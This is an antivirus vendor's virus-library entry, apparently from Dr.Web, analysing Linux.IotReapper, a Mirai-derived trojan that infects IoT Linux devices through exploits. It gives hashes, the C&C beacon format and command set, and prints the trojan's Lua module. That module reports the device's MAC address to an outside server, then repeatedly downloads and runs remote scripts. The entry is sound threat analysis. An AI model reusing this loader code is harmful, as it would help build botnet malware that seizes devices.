Bibliothèque
Ma bibliothèque

Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

Bibliothèque de virus

L’analyse des technologies utilisées par les pirates nous permet de déterminer les axes potentiels d’évolution de l’industrie cybercriminelle et de résister aux futures menaces de manière plus efficace. Vous pouvez également en savoir plus sur le comportement des programmes malveillants dans les systèmes contaminés et sur les méthodes permettant de contrer les menaces.

Linux.IotReapper in virus library:

SHA1:

  • cd078ef54430c9ef9aa24dfbb7c89456f13e86f6
  • 8f40a00effdc150d15f7a49ce7c72efc5fc364d9

A Trojan that infects IoT Linux devices. It is a modified version of Linux.Mirai.

Instead of brute-forcing logins and passwords to hack devices, Linux.IotReapper launches exploits (at the present moment it uses 10 exploits) and checks the result of their execution. If a device is vulnerable, it uses the GET request to send to its command and control (C&C) server the following structure:

struct
{
  char host[40];
  char port[10];
  char user[30];
  char password[40];
  char gw_name[30];
  char device_id[30];
} DeviceInfo

where device_id — a unique identifier of the infected device.

Periodically, it sends to the C&C servers the following requests:

/rx/hx.php?mac=52-54-00-12-34-56&&port=3000&type=etag&ver=1.07&act=finish

where the values of the act parameter are exit code system call, or finish, if there is no launched files.

The Trojan obtains commands from the C&C server in the JSON format. It processes the following commands:

keyvalue
state0 or 1
coderun — download and run, down — only download
ipsource for downloading
namename of the file saved to the /tmp/ folder
md5its md5
porthttp port
pathurl to a file
runtype
runport

The Trojan downloads from the remote server a module of the Lua interpreter for the architectures ARM and MIPS. The module contains the following code in the Lua language:


local sock = require("socket")
local http = require("socket.http")
local ltn12 = require("ltn12")
 
local lua_url = "***http://***.com:8080/run.lua"
local tj_url = "http://bbk80.com/api/api.php"
 
local request_body = "macaddress=" .. DEVICE_MAC .. "&device=TP-Link775" .. "&type=armv5le&version=" .. VERSION
local if_modified_since = nil;
 
function http.get(u)
    local t = {}
    local headers = {
    }
 
    if if_modified_since ~= "" then
        headers = {
            ["If-Modified-Since"] = if_modified_since
        }
    end
    local r, c, h = http.request{
        headers = headers,
        url = u,
        sink = ltn12.sink.table(t)
    }
 
     
    if c == 200 then
        if_modified_since = h["date"]
    end
    return r, c, h, table.concat(t)   
end
 
 
http.request(tj_url,request_body)
local r,code,header,body=http.get(lua_url)
while true do
    if code == 200 then
        attack(body)
        print("Download Succeed")
    elseif code == 304 then
        --print("Download Not Modified")
    else
        print("Download Failed:" .. code)
    end
    sock.sleep(5 * 60)
    r,code,header,body=http.get(lua_url)
    http.request(tj_url,request_body)
    collectgarbage("collect")
end

This module can currently download and launch a script that looks the following way:


print("Just Test")
 

The functions of the Trojan allow to receive links, download a file from them and launch it. However, attempts to obtain active links were unsuccessful during the research of the sample.

Les vulnérabilités de l’OS Android.

Selon les statistiques, un programme sur cinq créé pour Android comporte une vulnérabilité (ou autrement dit, un " trou "), ce qui permet aux pirates de contaminer les appareils.

Le Contrôleur de sécurité au sein de Dr.Web pour Android analyse le système afin de détecter les problèmes de sécurité et propose des solutions pour y remédier.